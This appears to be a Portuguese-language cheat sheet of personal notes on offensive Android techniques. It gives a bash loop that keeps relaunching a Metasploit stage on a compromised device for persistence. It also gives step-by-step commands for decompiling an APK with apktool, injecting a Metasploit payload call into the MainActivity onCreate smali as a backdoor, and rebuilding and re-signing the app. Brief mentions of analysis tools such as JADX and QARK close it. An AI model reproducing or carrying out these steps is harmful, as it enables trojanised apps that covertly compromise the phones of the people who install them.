⇒ Dentro do Android

• Script para executar no Android do alvo após invadir, para manter persistência mesmo após fechar o App malicioso

  #!/bin/bash
  while:
  do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  sleep 15
  done
  

⇒ APKTOOL

• apktool b -o teste.apk teste/
  • Build de uma pasta para APK
  • Bom para recompilar um APP após alterações em seu código e testes.
• apktool d teste.apk
  • Decompilar o APK
  • Gera os arquivos smali, XML, Manifest, Java, Dex e etc...
• apktool empty-framework-dir —force
  • Limpar cache do APKTOOL em casos de falhas.

<aside> 💡 Caso dê problemas para executar o comando APKTOOL, basta como alternativa baixar o .jar e usar através do comando: java -jar apktool.jar <command> <option>

</aside>

Comandos após APKTOOL

• Encontrar o arquivo principal de execução Smali

  • find ./ -name *.smali -exec grep -H -i ";→onCreate" {} \\;
    • Comando para encontrar o MainActivity smali.
      • O Core de executação do APP.
      • Lugar onde se injeta payloads maliciosos como backdoors.
      • Esse comando já busca a linha onde se encontra a instancia de criação do APP (a primeira a ser executada quando ele é aberto).

• Invocar um Payload (backdoor, exploit) no MainActivity Smali, para executar quando o alvo executar o APP.

  • Basta encontrar o arquivo e o método de onCreate (o que inicia o APP em si).
  • Em baixo do ;→onCreate:
    • invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
      • Caminho até o Payload.
      • É bom criar uma basta para armazenar o arquivo do Payload dentro da pasta Smali.

• Gerar nova chave de assinatura para APK recompilado

  keytool -genkey -v -keystore debug.keystore -storepass android -alias nomechave -keypass android -keyalg RSA -keysize 2048 -vailidity 10000
  

  • Assinar com chave gerada

    ./jdk1.8/bin/jarsigner -verbose -keystore debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA teste.apk nomechave
    

⇒ JD-GUI / DEX2JAR / JADX

Instalar jd-gui _ dex2jar _ jadx.txt

⇒ QARK

Análise de APK ou APP direto via USB

• Gera um Relatório Simples em HTML